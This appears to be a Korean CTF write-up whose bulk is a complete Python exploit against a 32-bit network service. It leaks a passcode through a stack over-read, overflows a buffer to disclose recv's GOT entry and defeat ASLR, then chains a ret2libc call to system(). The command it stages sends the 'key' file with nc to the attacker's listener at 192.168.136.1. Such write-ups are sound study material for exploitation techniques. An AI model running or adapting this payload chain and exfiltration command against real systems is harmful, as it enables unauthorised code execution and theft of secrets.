서버 환경을 몰라서 Ubuntu 14.04 64bit에 Full ASLR 환경으로 설정 후 풀었습니다. 따라서 아래 코드의 recv→system 오프셋(0x1010)은 해당 환경의 libc 빌드에서만 유효하며, 실제 서버의 libc가 다르면 오프셋을 다시 구해야 합니다.
원래 처음엔 mprotect 함수를 이용하여 쉘을 따려고 했으나 잘 되지 않아서 그냥 키 값만 읽어오도록 했습니다.
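# -*- coding: utf-8 -*-
"""Three-stage ret2libc exploit for a 32-bit network service (CTF write-up).

Stage 1 over-reads a stack buffer to leak a 4-byte passcode that gates the
vulnerable code path.  Stage 2 overflows that path and calls ``send@plt`` to
disclose the GOT entry of ``recv``, defeating ASLR.  Stage 3 overflows again,
calls ``recv@plt`` to stage a shell command in writable ``.bss``, and returns
into ``system()`` with that buffer as its argument.

All addresses and the ``system - recv`` offset are specific to the author's
binary and to the Ubuntu 14.04 i386 libc it was solved against; they will not
transfer to another build.  The staged command exfiltrates ``key`` with ``nc``
to the attacker's listener.  Only run this against a target you are
authorised to attack.
"""
from __future__ import print_function

import binascii
import struct
from contextlib import closing
from socket import create_connection
from time import sleep

try:
    from hackutil import banner  # author's helper library; purely cosmetic
except ImportError:  # exploit does not depend on it
    def banner():
        """Fallback when the author's helper library is unavailable."""
        pass

# ==========================================
TARGET = ('192.168.136.137', 1129)   # vulnerable service
SOCK_TIMEOUT = 5.0                   # seconds; a dead peer should fail, not hang forever
PASSCODE_OFFSET = 30                 # bytes past the echoed leak where the passcode sits
# Command staged into .bss and executed by system().  The explicit NUL makes
# the C string well-formed even if .bss is no longer zero-filled.
COMMAND = b'nc 192.168.136.1 12595 < key\x00'

leak = b'A' * 0x200
recv_plt = 0x080488E0
recv_got = 0x0804B074
send_plt = 0x08048900
ppppr = 0x0804917c                   # pop;pop;pop;pop;ret gadget: skips 4 stacked args
vuln_func = 0x08048B5B               # re-entered after stage 2 so one connection serves both stages
data_ = 0x0804b090                   # writable .bss address used to stage COMMAND
offset_system_recv = 0x1010          # system - recv in the target libc (Ubuntu 14.04 i386 only)
# ==========================================


def p32(value):
    """Pack ``value`` as a 32-bit little-endian unsigned integer."""
    return struct.pack('<I', value & 0xffffffff)


def up32(data):
    """Unpack the first 4 bytes of ``data`` as a little-endian unsigned integer."""
    return struct.unpack('<I', data[:4])[0]


def recv_exact(sock, count):
    """Read exactly ``count`` bytes from ``sock``.

    ``recv()`` may return a partial buffer, so slicing a single ``recv(1024)``
    is not a reliable way to pick up a 4-byte leak.

    Raises:
        IOError: the peer closed the connection before ``count`` bytes arrived.
        socket.timeout: no data within ``SOCK_TIMEOUT`` seconds.
    """
    buf = b''
    while len(buf) < count:
        chunk = sock.recv(count - len(buf))
        if not chunk:
            raise IOError('connection closed after %d of %d bytes'
                          % (len(buf), count))
        buf += chunk
    return buf


def connect():
    """Open a TCP connection to ``TARGET`` with a read/write timeout."""
    return create_connection(TARGET, SOCK_TIMEOUT)


def leak_passcode():
    """Stage 1: over-read the stack and return the 4-byte passcode.

    Raises:
        IOError: the echoed data was too short to contain the passcode.
    """
    print("==================[ Phase 1 : Passcode leak ]==================")
    with closing(connect()) as s:
        s.recv(1024)
        s.send(b'target\n')
        sleep(0.1)
        s.recv(1024)
        s.send(b'1234.12341234/1234.12341234\n')
        sleep(0.1)
        s.recv(1024)
        # The service echoes the oversized input plus adjacent stack bytes.
        s.send(leak + b'\n')
        sleep(0.1)
        data = s.recv(1024)
    start = len(leak) + PASSCODE_OFFSET
    passcode = data[start:start + 4]
    if len(passcode) != 4:
        raise IOError('short leak: received %d bytes, passcode expected at offset %d'
                      % (len(data), start))
    # Hex rather than raw: the passcode bytes need not be printable.
    print("[*] passcode : " + binascii.hexlify(passcode).decode('ascii'))
    return passcode


def exploit(passcode):
    """Stages 2 and 3: leak libc via the GOT, then ret2libc into system().

    Both stages share one connection: the stage-2 chain returns into
    ``vuln_func`` so the same overflow can be triggered a second time.
    The first argument ``4`` to send/recv is assumed to be the server-side
    descriptor of this client socket (stdin/stdout/stderr + listener).
    """
    print("================[ Phase 2 : Find Library Func ]================")
    with closing(connect()) as s2:
        s2.recv(1024)
        s2.send(b'launch\n')
        sleep(0.1)
        s2.recv(1024)
        # 0x20C bytes of buffer + 4 bytes saved EBP, then:
        #   send(4, recv_got, 4, 0)  -> leaks recv's resolved address
        #   ret -> vuln_func          -> second overflow opportunity
        payload2 = b'A' * (0x20C + 4)
        payload2 += p32(send_plt) + p32(ppppr) + p32(4) + p32(recv_got) + p32(4) + p32(0)
        payload2 += p32(vuln_func) + p32(0) + p32(4)
        s2.send(passcode + b'\n')
        sleep(0.1)
        s2.recv(1024)
        s2.send(payload2)
        sleep(0.1)
        recv_lib = up32(recv_exact(s2, 4))
        system_lib = recv_lib + offset_system_recv
        print("[*] Found recv_lib : " + hex(recv_lib))
        print("[*] Found system_lib : " + hex(system_lib))

        print("=================[ Phase 3 : Attack with RTL ]=================")
        #   recv(4, data_, 0xff, 0)  -> writes COMMAND into .bss
        #   system(data_)            -> "AAAA" is system's unused return address
        payload3 = b'A' * (0x20c + 4)
        payload3 += p32(recv_plt) + p32(ppppr) + p32(4) + p32(data_) + p32(0xff) + p32(0)
        payload3 += p32(system_lib) + b"AAAA" + p32(data_)
        s2.send(payload3)
        sleep(0.1)
        s2.send(COMMAND)


def main():
    """Run all three stages; the key arrives at the nc listener, not here."""
    banner()
    passcode = leak_passcode()
    exploit(passcode)
    # Printed once the payload was delivered; success is confirmed on the listener.
    print("========================[ Got the Key ]========================")


if __name__ == '__main__':
    main()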